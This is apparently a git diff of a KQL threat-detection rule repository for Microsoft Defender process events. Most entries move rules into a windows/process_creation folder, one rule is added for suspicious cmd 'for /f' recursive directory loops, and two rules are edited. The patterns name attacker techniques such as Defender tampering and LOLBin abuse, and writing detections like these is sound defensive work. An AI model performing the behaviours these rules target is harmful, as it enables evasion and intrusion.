b/KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql rename to KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql rename to KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql rename to KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql diff --git a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql rename to KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql diff --git a/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql b/KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql similarity index 100% rename from KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql rename to KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql diff --git a/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql b/KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql rename to KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql diff --git a/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql b/KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql rename to KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql b/KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql rename to KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql diff --git a/KQL/rules/Persistence/suspicious_service_path_modification.kql b/KQL/rules/windows/process_creation/suspicious_service_path_modification.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_service_path_modification.kql rename to KQL/rules/windows/process_creation/suspicious_service_path_modification.kql diff --git a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql rename to KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql diff --git a/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql b/KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql rename to KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql diff --git a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql diff --git a/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql b/KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql rename to KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql diff --git a/KQL/rules/Execution/suspicious_spool_service_child_process.kql b/KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_spool_service_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql diff --git a/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql b/KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql similarity index 100% rename from KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql rename to KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql diff --git a/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_system_user_process_creation.kql rename to KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql diff --git a/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql b/KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql rename to KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql diff --git a/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql b/KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql rename to KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql diff --git a/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql b/KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql similarity index 100% rename from KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql rename to KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql diff --git a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql rename to KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql diff --git a/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql rename to KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql diff --git a/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql new file mode 100644 index 00000000..29fd1b73 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Usage of For Loop with Recursive Directory Search in CMD +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2025-11-12 +// Level: medium +// Description: Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing. +// This pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection. +// This behavior has been observed in various malicious lnk files. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1027.010 + +DeviceProcessEvents +| where (ProcessCommandLine contains "for /f" and ProcessCommandLine contains "tokens=" and ProcessCommandLine contains "in (" and ProcessCommandLine contains "dir") or (InitiatingProcessCommandLine contains "for /f" and InitiatingProcessCommandLine contains "tokens=" and InitiatingProcessCommandLine contains "in (" and InitiatingProcessCommandLine contains "dir") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql rename to KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql diff --git a/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql b/KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql similarity index 100% rename from KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql rename to KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql diff --git a/KQL/rules/Discovery/suspicious_use_of_psloglist.kql b/KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_use_of_psloglist.kql rename to KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql b/KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql diff --git a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql rename to KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql diff --git a/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql b/KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql diff --git a/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql b/KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql rename to KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql diff --git a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql similarity index 100% rename from KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql rename to KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql diff --git a/KQL/rules/Discovery/suspicious_where_execution.kql b/KQL/rules/windows/process_creation/suspicious_where_execution.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_where_execution.kql rename to KQL/rules/windows/process_creation/suspicious_where_execution.kql diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql rename to KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql rename to KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql b/KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql rename to KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql diff --git a/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql rename to KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql rename to KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql diff --git a/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql b/KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql similarity index 100% rename from KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql rename to KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql diff --git a/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql b/KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql rename to KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql diff --git a/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql b/KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_wmiprvse_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql diff --git a/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql b/KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql rename to KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql diff --git a/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql rename to KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql diff --git a/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql b/KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql rename to KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql diff --git a/KQL/rules/Execution/suspicious_zipexec_execution.kql b/KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql similarity index 100% rename from KQL/rules/Execution/suspicious_zipexec_execution.kql rename to KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql b/KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql similarity index 100% rename from KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql rename to KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql b/KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql similarity index 100% rename from KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql rename to KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql diff --git a/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql b/KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql rename to KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql diff --git a/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql b/KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql rename to KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql diff --git a/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql b/KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql rename to KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql diff --git a/KQL/rules/Defense Evasion/sysmon_configuration_update.kql b/KQL/rules/windows/process_creation/sysmon_configuration_update.kql similarity index 100% rename from KQL/rules/Defense Evasion/sysmon_configuration_update.kql rename to KQL/rules/windows/process_creation/sysmon_configuration_update.kql diff --git a/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql b/KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql similarity index 100% rename from KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql rename to KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql diff --git a/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql rename to KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql diff --git a/KQL/rules/Execution/sysprep_on_appdata_folder.kql b/KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql similarity index 100% rename from KQL/rules/Execution/sysprep_on_appdata_folder.kql rename to KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql diff --git a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql b/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql similarity index 57% rename from KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql rename to KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql index ed35a173..3f7329a8 100644 --- a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql +++ b/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql @@ -7,4 +7,4 @@ // Tags: attack.defense-evasion, attack.t1036 DeviceProcessEvents -| where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\")) \ No newline at end of file +| where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\werfaultsecure.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\")) \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql b/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql similarity index 55% rename from KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql rename to KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql index cd3d4b91..e060abbd 100644 --- a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql +++ b/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql @@ -9,4 +9,4 @@ // - Unlikely DeviceProcessEvents -| where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks") \ No newline at end of file +| where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql b/KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql similarity index 100% rename from KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql rename to KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql diff --git a/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql b/KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql similarity index 100% rename from KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql rename to KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql diff --git a/KQL/rules/Exfiltration/tap_installer_execution.kql b/KQL/rules/windows/process_creation/tap_installer_execution.kql similarity index 100% rename from KQL/rules/Exfiltration/tap_installer_execution.kql rename to KQL/rules/windows/process_creation/tap_installer_execution.kql diff --git a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql b/KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql similarity index 100% rename from KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql rename to KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql diff --git a/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql b/KQL/rules/windows/process_creation/taskmgr_as_local_system.kql similarity index 100% rename from KQL/rules/Defense Evasion/taskmgr_as_local_system.kql rename to KQL/rules/windows/process_creation/taskmgr_as_local_system.kql diff --git a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql b/KQL/rules/windows/process_creation/tasks_folder_evasion.kql similarity index 100% rename from KQL/rules/Privilege Escalation/tasks_folder_evasion.kql rename to KQL/rules/windows/process_creation/tasks_folder_evasion.kql diff --git a/KQL/rules/Initial Access/terminal_service_process_spawn.kql b/KQL/rules/windows/process_creation/terminal_service_process_spawn.kql similarity index 100% rename from KQL/rules/Initial Access/terminal_service_process_spawn.kql rename to KQL/rules/windows/process_creation/terminal_service_process_spawn.kql diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql b/KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql similarity index 100% rename from 